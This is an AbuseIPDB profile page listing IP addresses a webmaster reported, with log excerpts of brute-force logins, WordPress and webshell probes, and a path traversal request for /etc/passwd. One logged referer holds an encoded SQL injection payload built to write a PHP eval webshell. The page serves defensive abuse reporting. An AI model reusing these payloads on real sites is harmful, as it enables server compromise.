bgg - AbuseIPDB User Profile

Check an IP Address, Domain Name, or Subnet

e.g. 44.200.25.51, microsoft.com, or 5.188.10.0/24

User bgg, the webmaster of bgg.ovh, joined AbuseIPDB in May 2020 and has reported 32,239 IP addresses.

Standing (weight) is good.

ACTIVE USER WEBMASTER

IP	Date	Comment	Categories
2.57.122.153	10 hours ago	May 19 20:28:45 mail2 postfix/smtpd[6853]: warning: mail.vsb-servservicegermany.club[2.57.122.153]: ... show moreMay 19 20:28:45 mail2 postfix/smtpd[6853]: warning: mail.vsb-servservicegermany.club[2.57.122.153]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 May 19 23:37:07 mail2 postfix/smtpd[14999]: warning: mail.vsb-servservicegermany.club[2.57.122.153]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 May 20 02:47:12 mail2 postfix/smtpd[8101]: warning: mail.vsb-servservicegermany.club[2.57.122.153]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 May 20 05:47:27 mail2 postfix/smtpd[15447]: warning: mail.vsb-servservicegermany.club[2.57.122.153]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 show less	Brute-Force
222.187.223.174	19 May 2022	222.187.223.174 - - [19/May/2022:13:24:47 +0200] "GET /Public/admin/webuploader/server/preview.php H ... show more222.187.223.174 - - [19/May/2022:13:24:47 +0200] "GET /Public/admin/webuploader/server/preview.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" show less	Hacking Bad Web Bot Web App Attack
128.14.75.238	19 May 2022	128.14.75.238 - - [19/May/2022:10:25:33 +0200] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HT ... show more128.14.75.238 - - [19/May/2022:10:25:33 +0200] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.1" 301 show less	Hacking Bad Web Bot Web App Attack
80.181.49.11	19 May 2022	80.181.49.11 - - [19/May/2022:12:06:13 +0200] "GET /wp-login.php HTTP/1.1" 403 2221 "-" "Mozilla/4.0 ... show more80.181.49.11 - - [19/May/2022:12:06:13 +0200] "GET /wp-login.php HTTP/1.1" 403 2221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" show less	Hacking Bad Web Bot Web App Attack
217.160.145.62	19 May 2022	217.160.145.62 - - [19/May/2022:01:37:34 +0200] "GET /wp-content/uploads/typehub/custom/zyysmbkb/.sp ... show more217.160.145.62 - - [19/May/2022:01:37:34 +0200] "GET /wp-content/uploads/typehub/custom/zyysmbkb/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1" 301 178 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" show less	Hacking Web App Attack
20.248.195.42	19 May 2022	20.248.195.42 - - [19/May/2022:13:26:55 +0200] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 403 2227 ... show more20.248.195.42 - - [19/May/2022:13:26:55 +0200] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 403 2227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36 show less	Web App Attack
49.51.74.129	19 May 2022	49.51.74.129 - - [19/May/2022:12:57:38 +0200] "GET /wp_wrong_datlib.php HTTP/1.1" 403 1334 "www.bing ... show more49.51.74.129 - - [19/May/2022:12:57:38 +0200] "GET /wp_wrong_datlib.php HTTP/1.1" 403 1334 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" show less	Hacking Bad Web Bot Web App Attack
161.97.103.248	19 May 2022	161.97.103.248 - - [19/May/2022:03:42:54 +0200] "HEAD /backup HTTP/1.1" 40	Hacking Bad Web Bot Web App Attack
172.104.159.48	19 May 2022	2022-05-19 14:49:00 140243915577088 [Warning] Access denied for user ''@'172-104-159- ... show more2022-05-19 14:49:00 140243915577088 [Warning] Access denied for user ''@'172-104-159-48.ip.linodeusercontent.com' (using password: NO) 2022-05-19 14:49:00 140244062828288 [Warning] Access denied for user 'root'@'172-104-159-48.ip.linodeusercontent.com' (using password: NO) show less	Brute-Force
72.167.44.205	17 May 2022	2022-05-16 12:03:19,533 fail2ban.actions [926]: NOTICE [mysqld-auth] Ban 72.167.44.205	Brute-Force
61.177.173.53	17 May 2022	SSH Brute-Force	Brute-Force SSH
61.177.173.50	17 May 2022	SSH Brute-Force	Brute-Force SSH
20.212.116.99	15 May 2022	20.212.116.99 - - [15/May/2022:00:51:06 +0200] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 403 2223 ... show more20.212.116.99 - - [15/May/2022:00:51:06 +0200] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 403 2223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" show less	Web App Attack
115.221.66.88	15 May 2022	115.221.66.88 - - [15/May/2022:10:31:50 +0200] "GET /wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 ... show more115.221.66.88 - - [15/May/2022:10:31:50 +0200] "GET /wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" show less	Web App Attack
176.31.116.73	15 May 2022	176.31.116.73 - - [15/May/2022:06:49:43 +0200] "GET /wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 ... show more176.31.116.73 - - [15/May/2022:06:49:43 +0200] "GET /wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" show less	Web App Attack
31.61.180.198	15 May 2022	31.61.180.198 - - [15/May/2022:13:49:34 +0200] "GET /wp-login.php HTTP/1.1" 403 2220 "-" "Mozilla/4. ... show more31.61.180.198 - - [15/May/2022:13:49:34 +0200] "GET /wp-login.php HTTP/1.1" 403 2220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" show less	Web App Attack
5.34.207.153	12 May 2022	2022-05-11 19:41:01,298 fail2ban.actions [926]: NOTICE [postfix-sasl] Ban 5.34.207.153	Brute-Force
154.208.100.234	11 May 2022	154.208.100.234 - - [10/May/2022:12:25:39 +0200] "GET /user.php?act=login HTTP/1.1" 403 2225 "45ea20 ... show more154.208.100.234 - - [10/May/2022:12:25:39 +0200] "GET /user.php?act=login HTTP/1.1" 403 2225 "45ea207d7a2b68c49582d2d22adf953aads\|a:2:{s:3:\x22num\x22;s:289:\x22/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" show less	Hacking Web App Attack
172.105.255.172	11 May 2022	Distributed web scraping from LINODE	Bad Web Bot
5.34.207.153	11 May 2022	2022-05-11 07:39:03,394 fail2ban.actions [926]: NOTICE [postfix-sasl] Ban 5.34.207.153	Brute-Force
74.208.34.233	11 May 2022	74.208.34.233 - - [11/May/2022:01:28:03 +0200] "GET /wp-login.php HTTP/1.1" 403	Web App Attack
192.169.176.214	11 May 2022	192.169.176.214 - - [11/May/2022:08:35:13 +0200] "GET /phpinfo.php HTTP/1.1" 301 178 "-" "Mozlila/5. ... show more192.169.176.214 - - [11/May/2022:08:35:13 +0200] "GET /phpinfo.php HTTP/1.1" 301 178 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" show less	Hacking Web App Attack
109.60.95.182	11 May 2022	109.60.95.182 - - [11/May/2022:08:19:35 +0200] "GET /wp-login.php HTTP/1.1" 403 2223 "-" "Mozilla/4. ... show more109.60.95.182 - - [11/May/2022:08:19:35 +0200] "GET /wp-login.php HTTP/1.1" 403 2223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" show less	Web App Attack
213.229.119.151	09 May 2022	May 8 23:36:29 mail2 postfix/smtpd[8802]: warning: 213-229-119-151.static.as29550.net[213.229.119.1 ... show moreMay 8 23:36:29 mail2 postfix/smtpd[8802]: warning: 213-229-119-151.static.as29550.net[213.229.119.151]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 May 9 05:40:34 mail2 postfix/smtpd[7991]: warning: 213-229-119-151.static.as29550.net[213.229.119.151]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 May 9 09:09:03 mail2 postfix/smtpd[16465]: warning: 213-229-119-151.static.as29550.net[213.229.119.151]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 May 9 12:37:45 mail2 postfix/smtpd[26217]: warning: 213-229-119-151.static.as29550.net[213.229.119.151]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 show less	Brute-Force
2.57.168.183	09 May 2022	672 http 403 requests ! 2.57.168.183 - - [08/May/2022:00:01:08 +0200] "GET /../../../../../.. ... show more672 http 403 requests ! 2.57.168.183 - - [08/May/2022:00:01:08 +0200] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 166 "-" "-" show less	Hacking Web App Attack